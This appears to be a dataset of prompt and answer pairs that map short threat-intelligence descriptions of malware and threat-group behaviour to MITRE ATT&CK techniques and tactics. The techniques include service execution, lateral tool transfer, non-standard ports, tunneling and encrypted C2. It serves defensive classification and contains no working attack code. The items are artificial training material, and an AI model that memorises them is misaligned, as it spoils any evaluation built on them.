+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can run a command on another machine using PsExec.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner started the cryptomining virtual machine as a service on the infected machine.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can create a remote service, let it run once, and then delete it.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net start and net stop commands can be used in Net to execute or stop Windows services.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Net Crawler uses PsExec to perform remote service manipulation to execute a copy of itself as part of lateral movement.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya can use PsExec to help propagate itself across a network.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's loader can create a new service named NtmsSvc to execute the payload.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer utilizes PsExec to help propagate itself across a network.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora has the ability to install itself as a Windows service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains an implementation of PsExec for remote execution.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc registers itself as a service on the victim’s machine to run as a standalone process.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Microsoft Sysinternals PsExec is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy uses PsExec to execute a payload or commands on a remote host.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has used PsExec to copy and execute the ransomware.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has used sc.exe to execute a service that it creates.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RemoteCMD can execute commands remotely by creating a new service on the remote system.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has the capability to start services.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon creates a new service named “ntssrv” to execute the payload. Shamoon can also spread via PsExec.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can install a service to execute itself as a service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can manage services and processes.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla can install itself as a service on compromised machines.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can execute itself as a service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can download and execute AdvancedRun.exe via `sc.exe`.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winexe installs a service on the remote system, executes the command, then uninstalls the service.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird uses services.exe to register a new autostart service named ""Audit Service"" using a copy of the local lsass.exe file.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can run as a service using svchost.exe.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can create a new service for execution.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT can execute its service if the Service key exists. If the key does not exist, gh0st RAT will create and run the service.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCmd can be used to execute binaries on remote systems by creating and starting a service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team moved their tools laterally within the corporate network and between the ICS and corporate network.","Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used `move` to transfer files to a network share.","Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team used a Group Policy Object (GPO) to copy CaddyWiper's executable `msserver.exe` from a staging server to a local hard drive before deployment.","Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.","Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.","Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used SMB to copy files to and from target systems.","Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has deployed tools after moving laterally using administrative accounts.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 uses remote shares to move and remotely execute payloads during lateral movemement.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has copied tools between compromised hosts using SMB.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM has used PsExec to move laterally between hosts in the target network.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has copied tools within a compromised network using RDP.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used `move` to transfer files to a network share and has copied payloads--such as Prestige ransomware--to an Active Directory Domain Controller and distributed via the Default Domain Group Policy Object.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla RPC backdoors can be used to transfer files to/from victim machines on the local network.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has copied web shells between servers in targeted environments.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can replicate itself across connected servers via `psexec`.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky searches for network drives and removable media and duplicates itself onto them.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has copied itself to remote systems using the `service.exe` filename.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Expand can be used to download or upload a file over a network share.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can copy files to other machines on a compromised network.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LockerGoga has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.","Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can use certutil for propagation on Windows hosts within intranets.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Operators deploying Netwalker have used psexec to copy the Netwalker payload across accessible systems.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer attempts to copy itself to remote machines on the network.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PsExec can be used to download or upload a file over a network share.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon attempts to copy itself to remote machines on the network.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: cmd can be used to copy files to/from a remotely connected internal system.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: esentutl can be used to copy files to/from a remote share.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ftp may be abused by adversaries to transfer tools or files between systems within a compromised environment.,"Tecnique: T1570 Lateral Tool Transfer, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, the threat actors used uncommon high ports for its backdoor C2, including ports 25667 and 47000.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has used port 4050 for C2 communications.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT32 backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used HTTP over TCP ports 808 and 880 for command and control.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke's miner connects to a C2 server using port 51640.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used port 6789 to accept connections on the group's SSH server.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used port 444 when sending data about the system from the client to the server.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has used HTTPS over ports 2083 and 2087 for C2.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL communicates on ports 443 and 8000 with a FakeTLS method.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi has used unencrypted HTTP on port 443 for C2.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used HTTP over ports such as 20, 22, 443, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HARDRAIN binds and listens on port 443 with a FakeTLS method.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has used TCP port 5633 for C2 Communication.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has communicated with hosts over raw TCP on port 9999.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has used a custom binary protocol over TCP port 443 for C2.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can use HTTPS over port 8080 for C2.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT used TLS to encrypt communications over port 143,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can use port 4782 on the compromised host for TCP callbacks.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM used Port 44443 for its VNC module.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can use HTTP over non-standard ports, such as 995, for C2.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro uses a custom binary protocol over TCP port 443.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARUSH has used port 4585 for a TCP connection to its C2.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to connect with actor-controlled C2 servers using a custom binary protocol over port 443.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has used HTTPS over port 1402 in C2 communication.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.","Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can use ports 1985 and 1986 in HTTP/S communication.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has used port 1177 for HTTP C2 communications.,"Tecnique: T1571 Non-Standard Port, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed the GOGETTER tunneler software to establish a “Yamux” TLS-based C2 channel with an external server(s).","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used SSH tunneling in targeted environments.","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used encrypted SSH-based PLINK tunnels to transfer tools and enable RDP connections throughout the environment.","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used Iodine to tunnel IPv4 traffic over DNS.","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used the Iox and NPS proxy and tunneling tools in combination create multiple connections through a single tunnel.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used the Plink utility to create SSH tunnels.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized web shells and Java tools for tunneling capabilities to and from compromised assets.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used protocol tunneling for communication and RDP activity on compromised hosts through the use of open source tools such as ngrok and custom tool SSHMinion.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used Plink to tunnel RDP over SSH.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used the Plink utility and other tools to create tunnels to C2 servers.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use DNS over HTTPS for C2.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can use DNS over HTTPS (DoH) to resolve C2 nodes.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FLIPSIDE uses RDP to tunnel traffic from a victim environment.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can connect to HTTP proxies via TCP to create a tunnel to C2.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can use a custom protocol tunneled through DNS or HTTP.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can use a custom protocol tunneled through DNS or HTTP.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic can use SOCKS proxies to tunnel traffic through another protocol.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has the ability to communicate over custom communications methodologies that ride over common network protocols including raw TCP and UDP sockets, HTTP, SMTP, and DNS.","Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ngrok can tunnel RDP and other services securely over internet connections.,"Tecnique: T1572 Protocol Tunneling, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles used cryptcat binaries to encrypt their traffic.","Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used multiple layers of encryption within malware to protect C2 communication.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has encrypted their C2 communications.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used an encrypted http proxy in C2 communications.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has encrypted traffic with the C2 to prevent network detection.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used encryption for its C2 channel.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cryptoistic can engage in encrypted communications with C2.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can support encrypted communications between the client and server.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has used TLS encryption to initialize a custom protocol for C2 communications.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
